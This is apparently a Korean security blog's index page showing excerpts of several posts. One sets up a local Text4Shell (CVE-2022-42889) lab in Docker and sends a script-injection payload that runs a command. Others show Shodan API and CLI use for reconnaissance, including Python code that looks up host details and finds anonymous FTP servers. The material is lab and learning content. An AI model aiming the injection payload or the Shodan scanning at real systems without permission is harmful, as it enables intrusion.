전체 글10 Text4shell PoC 테스트(cve-2022-42889) 1. git clone 및 jar 파일설치를 위한 maven 설치 git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git mvn clean install 2. Docker build docker build --tag=text4shell . 3. Docker 실행 docker run -p 80:8080 text4shell 4. text4shell 공격 실행 http://localhost/text4shell/attack?search= ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} curl http://localhost/text4shell/at.. 2022. 10. 24. 쇼단에서 검색결과를 download할 경우 json 데이터 값 shodan에서 검색 할 경우 결과값을 다운로드 할 수가 있다. 유료 회원의 경우 다운로드 받을 때마다 1 크레딧을 사용하게 된다. (멤버쉽 회원은 한달마다 100 크레딧으로 리셋됨.) 여기서 주의해야 할 점이 있다. 1 크레딧 당 100개의 검색결과를 가져온다고 써있다. 나는 97 크레딧이 남아있기 때문에 97*100 = 9700개의 결과값을 원하냐는 화면인데........ 이걸 그대로 다운로드 누를 경우.... 나의 쿼리 크레딧이 0이 되어버린다... 나는 이걸 인지 못했기 때문에, 이번달 쿼리 크레딧을 한번에 다 써버렸다... ㅠㅠ 다운로드 파일은 json 파일로 저장이 된다. json파일을 뜯어서 분석해보면, product, os, hostnames, org, data, port, ip_str 등.. 2022. 9. 5. 파이썬을 통한 쇼단(shodan) 서비스 활용 호스트 정보 상세 페이지 가져오기 import shodan SHODAN_API_KEY = "" api = shodan.Shodan(SHODAN_API_KEY) host = api.host('31.13.82.36') print(""" IP: %s Organization: %s Operating System: %s """ %(host['ip_str'], host.get('org', 'n/a'), host.get('os', 'n/a'))) for item in host['data']: print(""" Port: %s Banner: %s """ %(item['port'], item['data'])) FTP 서비스 중 익명으로 연결되는 IP 정보 가져오기 import shodan import re site = .. 2022. 9. 5. 쇼단(shodan) API를 활용한 정보수집 (칼리리눅스) 칼리리눅스에서 제공하는 shodan 옵션 기능 및 설명 필터 설명 stats 검색어에 대한 요약정보 제공 --facets 옵션 : 검색된 정보에서 어떤 기준으로 출력한 것인지를 결정. search shodan 데이터베이스 검색 scan shodan을 사용하여 단일 IP, 복수 네트워크 스캔. myip 사용하고 있는 외부 네트워크 ip주소 출력 init shodan을 사용하기 위한 정보 초기화. info 등록된 게정에 대한 일반 정보 host IP주소에 대해 사용 가능한 모든 정보 honeyscore IP가 허니팟인지 확인 download 검색결과를 압축 JSON으로 저장 parse 압축된 JSON 파일에서 정보를 추출 data Shodan에 접근할 수있는 대량 데이터 count 검색 결과 수를 반환 in.. 2022. 9. 4. 이전 1 2 3 다음
